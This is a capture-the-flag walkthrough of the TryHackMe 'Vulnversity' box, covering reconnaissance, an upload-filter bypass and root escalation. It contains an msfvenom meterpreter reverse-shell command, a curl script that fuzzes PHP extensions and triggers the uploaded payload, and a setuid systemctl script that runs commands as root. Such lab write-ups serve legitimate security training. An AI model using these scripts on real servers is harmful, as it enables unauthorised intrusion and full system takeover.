TryHackMe - Vulnversity

The room link can be found at TryHackMe - Vulnversity

Reconnaissance

Nmap

First, we do a simple Nmap scan

nmap $IP
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3128/tcp open  squid-http
3333/tcp open  dec-notes

Six ports are open. Note that the SERVICE column of a plain scan is only nmap's port-number lookup (3333 is listed as dec-notes because that is the registered name for the port), and the default scan covers only the 1000 most common TCP ports, so a full-port scan (-p-) is worth running as well. Next we run nmap -sC -sV $IP, which runs the default script set and fingerprints the actual service type and version.

nmap -sC -sV $IP
PORT     STATE SERVICE     VERSION
21/tcp   open  ftp         vsftpd 3.0.3
22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
|   256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_  256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open  http-proxy  Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open  http        Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: vulnuniversity
|   NetBIOS computer name: VULNUNIVERSITY\x00
|   Domain name: \x00
|   FQDN: vulnuniversity
|_  System time: 2020-09-02T14:44:45-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-09-02T18:44:46
|_  start_date: N/A

The OpenSSH banner (4ubuntu2.7), the Apache banner and the Samba version string (4.3.11-Ubuntu) all tell us the OS is Ubuntu Linux. The "Windows 6.1" line under smb-os-discovery is the compatibility value Samba reports to SMB clients, not the real OS, so it should not be trusted on its own.

Gobuster

There is an HTTP port open on 3333 so we can start enumerating it.

gobuster dir -w GitHub/SecLists/Discovery/Web-Content/big.txt -u http://10.10.232.204:3333/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.232.204:3333/
[+] Threads:        10
[+] Wordlist:       GitHub/SecLists/Discovery/Web-Content/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/09/02 20:52:40 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/internal (Status: 301)
/js (Status: 301)
/server-status (Status: 403)
===============================================================
2020/09/02 20:56:58 Finished
===============================================================

We can see various pages. Visiting them we find that on /internal there is an upload form.

If we run gobuster again on this path we can find a second directory /internal/uploads/.

Exploitation

Compromise the webserver

We start by generating our reverse shell payload. I chose a meterpreter reverse shell.

msfvenom --payload php/meterpreter/reverse_tcp  LHOST=$USER_IP LPORT=$PORT > payload.php

Let's also start the Metasploit console with an exploit/multi/handler, configured with the same payload, LHOST and LPORT as the msfvenom command.

Unfortunately, if we try to upload payload.php, the form rejects the .php extension. Trying the other extensions listed in the image from the challenge, we find one that the filter lets through and that Apache still executes as PHP. The uploaded file appears in the /internal/uploads/ directory we found earlier; requesting it there runs the payload and the handler catches the session.

We now have a shell on the box.
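The upload and trigger steps above, as an added example that is not part of the original writeup: the script uploads the same payload under each alternative PHP extension, checks the /internal/uploads/ directory listing to see which names the filter let through, and requests the first one that landed so Apache executes it. The form path /internal/index.php, the form field name "file" and the extension list are assumptions, not details confirmed by the writeup; which of those extensions Apache actually hands to PHP depends on the server's handler configuration, so a file that is listed but never connects back was allowed by the filter but not executed.

```shell
#!/bin/sh
# Added example (not from the writeup). Fuzz the /internal upload filter with
# alternative PHP extensions and trigger the first one that is accepted.
# Assumptions: the form posts to /internal/index.php, its file field is named
# "file", and the payload generated with msfvenom is ./payload.php.

# Extensions a blocklist that only rejects ".php" tends to miss (constructed list).
ALT_EXTS="phtml php3 php4 php5 phar"

# Print candidate filenames for a base name: payload.phtml, payload.php3, ...
candidate_names() {
    base=$1; shift
    for ext in "$@"; do
        printf '%s.%s\n' "$base" "$ext"
    done
}

# Return 0 if <name> appears as a link in an Apache directory listing (argument 1).
listed_in() {
    printf '%s' "$1" | grep -qF "href=\"$2\""
}

# POST the local payload to the upload form under a chosen remote name.
upload() {   # upload <base_url> <local_file> <remote_name>
    curl -s -o /dev/null -F "file=@$2;filename=$3" "$1/internal/index.php"
}

# Request the uploaded file so Apache executes it. A meterpreter payload never
# returns to the client, so cap the wait instead of hanging.
trigger() {  # trigger <base_url> <remote_name>
    curl -s --max-time 5 -o /dev/null "$1/internal/uploads/$2" || true
}

main() {     # main <base_url> [local_payload]
    base_url=$1
    payload=${2:-payload.php}
    stem=${payload%.*}
    for name in $(candidate_names "$stem" $ALT_EXTS); do
        upload "$base_url" "$payload" "$name"
        listing=$(curl -s "$base_url/internal/uploads/")
        if listed_in "$listing" "$name"; then
            echo "[+] $name passed the filter; requesting it (handler must be listening)"
            trigger "$base_url" "$name"
            return 0
        fi
        echo "[-] $name was rejected"
    done
    echo "[-] no candidate extension was accepted"
    return 1
}

# Only run against a target when one is given, e.g.:
#   ./upload_fuzz.sh http://10.10.232.204:3333 payload.php
if [ $# -ge 1 ]; then main "$@"; fi
```

Start the multi/handler before running the script, because the trigger request is what makes the payload connect back. Every accepted name leaves a copy of the shell on the server, so remove the extras once you have a session.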

Now we background the session and run post/linux/gather/enum_system against it to enumerate system information, including the user accounts. The loot command lists the gathered items, and at the end of the user list we find the user bill. In his home directory we find the user flag, which is readable by www-data (our current user).

Privilege escalation

To gather more information about the box, we use the meterpreter upload command to copy the linPEAS script over and run it. It lists the interesting findings on the box, including the SUID binaries. One of them stands out: systemctl. A setuid-root systemctl is bad news, because it lets any local user create, start and stop services, and services are run by systemd as root. We look up systemctl on GTFOBins to find an easy way to exploit it.

#!/bin/sh
# Abuse a setuid-root systemctl: any unit it starts is executed by systemd as root.
TF=$(mktemp).service            # absolute path under /tmp; systemctl link needs an absolute path
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > "$TF"
systemctl link "$TF"            # register the unit file in place
systemctl enable --now "$TF"    # enable it and start it immediately; ExecStart runs as root

This script creates a temporary service file, links it, enables it and starts it. The service runs as root and cats the flag into /tmp/output, which is created with root's default umask and is therefore readable by us. Instead of cat, ExecStart could just as well launch a reverse shell (for example a meterpreter payload) to get an interactive root shell on the box. The unit stays linked and enabled afterwards, so disable it and remove the file once you are done.
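The SUID check that linPEAS performs and that the privilege escalation relies on, as an added example that is not from the writeup, linPEAS or GTFOBins: it enumerates setuid-root files the same way (find with -perm -4000), flags the ones whose name has a known GTFOBins SUID entry, and provides a check to confirm a binary such as systemctl really is setuid and owned by root before you build a service around it. The list of names is a constructed subset of the GTFOBins SUID entries, not the full list.

```shell
#!/bin/sh
# Added example (not from the writeup). Triage setuid-root binaries the way
# linPEAS does and confirm the setuid bit before trusting a GTFOBins trick.

# Constructed subset of binaries with a GTFOBins SUID entry.
KNOWN_SUID_ESCALATORS="systemctl bash find vim nmap python python3 perl env cp less awk docker"

# Return 0 if <name> is in the known list, 1 otherwise.
known_suid_escalator() {
    for n in $KNOWN_SUID_ESCALATORS; do
        [ "$n" = "$1" ] && return 0
    done
    return 1
}

# Return 0 if <path> is a regular file with the setuid bit set and owned by uid 0.
# This is the check to run on $(command -v systemctl) before using the service trick.
suid_root_file() {
    [ -f "$1" ] && [ -u "$1" ] && [ "$(stat -c %u "$1" 2>/dev/null)" = 0 ]
}

# Enumerate setuid-root regular files on the local filesystems (what linPEAS
# lists under SUID); -xdev keeps find off network mounts and /proc.
suid_root_files() {
    find / -xdev -type f -perm -4000 -user root 2>/dev/null
}

# Print every setuid-root binary whose basename has a known GTFOBins entry.
triage() {
    suid_root_files | while IFS= read -r f; do
        if known_suid_escalator "$(basename "$f")"; then
            echo "[!] $f is setuid root and has a GTFOBins SUID entry"
        fi
    done
}

# Run the enumeration only when asked, e.g.: ./suid_triage.sh --run
if [ "${1-}" = "--run" ]; then triage; fi
```

On the Vulnversity box the expected hit is systemctl; on a normally configured Ubuntu host the output should contain nothing from this list, which is exactly why a setuid systemctl stood out in the linPEAS output.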